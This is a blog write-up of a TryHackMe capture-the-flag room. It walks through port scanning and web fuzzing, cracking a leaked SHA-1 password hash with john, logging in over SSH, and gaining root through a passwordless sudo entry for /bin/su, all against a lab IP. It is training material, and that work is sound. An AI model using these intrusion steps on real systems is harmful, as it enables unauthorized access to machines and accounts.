THM: Crash Course Pen Testing

THM: Crash Course Pen Testing

Write-up for final challenge at CC: Pen Testing room at TryHackMe

ยท

3 min read

Basic Information

#
TypeRegular Box
NameTry Hack Me / CC: Pen Testing
URLstryhackme.com/room/ccpentesting
AuthorAsentinn / OkabeRintaro
https://ctftime.org/team/152207

Contents

  1. Basic Information
  2. Recon
  3. Cracking user password
  4. Elevating privileges
  5. Additional readings

๐Ÿ”” CyberEthical.Me is maintained purely from your donations - consider one-time sponsoring with the Sponsor button or ๐ŸŽ become a Patron which also gives you some bonus perks.
Join our Discord Server!

Recon

Target IP is 10.10.113.202 - I'm assigning that to the variable for ease of use.

$ IP=10.10.113.202

Scanning for open ports

$ nmap -sC -sV -p- $IP -oN nmap-$IP.out

2021-08-31-20-40-46.png

And prepare input for the searchsploit

$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml
$ searchsploit --nmap nmap-10.10.113.202.xml

2021-08-31-20-45-31.png

Firing up nikto and fuff for practice

$ nikto -h $IP -o nikto-$IP.txt

2021-08-31-22-00-38.png

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$IP.md

ffuf command can be a little complicated, so let me explain it a bit

  • -w: wordlist for fuzzing
  • -u: target URL
  • -recursion, -recursion-depth: when fuff finds a directory, it starts another scan after the current finished (you will recognize it by Job [1/X] label)
  • -e: useful one, simultaneously tries to look for files with listed extensions - be careful with this one though, as it multiplies the amount of work by N where N is a number of extensions (because for each wordlist entry it tries appending these extensions).
  • -v: shows full URL of the findings (useful when using -recursion flag)
  • -of: output format, ffuf output files are not the easiest one to read, but and I choose the Markdown for now
  • -o: and this is just a name for the output file; $IP will resolve variable name and the result

2021-08-31-22-00-00.png

Back to top โคด

Cracking user password

Both find out the /secret/ directory and fuff further tracked the /secret/secret.txt.

$ curl http://10.10.200.35/secret/secret.txt

2021-08-31-22-02-54.png

Which definitely is the hash of user password. I will be using john to crack it, and it could be run blindly on that file, but lets use the hash-identifier that comes with Kali to see the output just out of curiosity.

$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8

2021-08-31-22-03-55.png

As we can see it is the SHA-1 hash. Now cracking it with john:

$ john -format=Raw-SHA1 secret.txt

2021-08-31-22-06-59.png

Which was really fast (don't ever use such weak passwords, of course). So we've got credentials nyan/nyan. Try logging with these on the SSH.

$ ssh nyan@$IP

2021-08-31-22-07-53.png

Were in. I'm getting the user flag.

nyan@ubuntu:~$ cat user.txt

Back to top โคด

Elevating privileges

2021-08-31-22-10-29.png

User nyan can run /bin/su as a root without specifying its password

And just by seeing this sudoer entry we know that nyan is a can execute sudo command.

Otherwise when running sudo -l we would see Sorry, user nyan may not run sudo on ubuntu (where ubuntu is the host name)

We got the root! So cat out that flag and complete the box.

root@ubuntu:/home/nyan# cat /root/root.txt

Additional readings

๐Ÿ“Œ Follow the #CyberEthical hashtag on the social media
๐ŸŽ Become a Patron and gain additional benefits
๐Ÿ‘พ Join CyberEthical Discord server
๐Ÿ‘‰ Instagram: @cyber.ethical.me
๐Ÿ‘‰ LinkedIn: Kamil Gierach-Pacanek
๐Ÿ‘‰ Twitter: @cyberethical_me
๐Ÿ‘‰ Facebook: @CyberEthicalMe

Back to top โคด

Did you find this article valuable?

Support Kamil Gierach-Pacanek by becoming a sponsor. Any amount is appreciated!

ย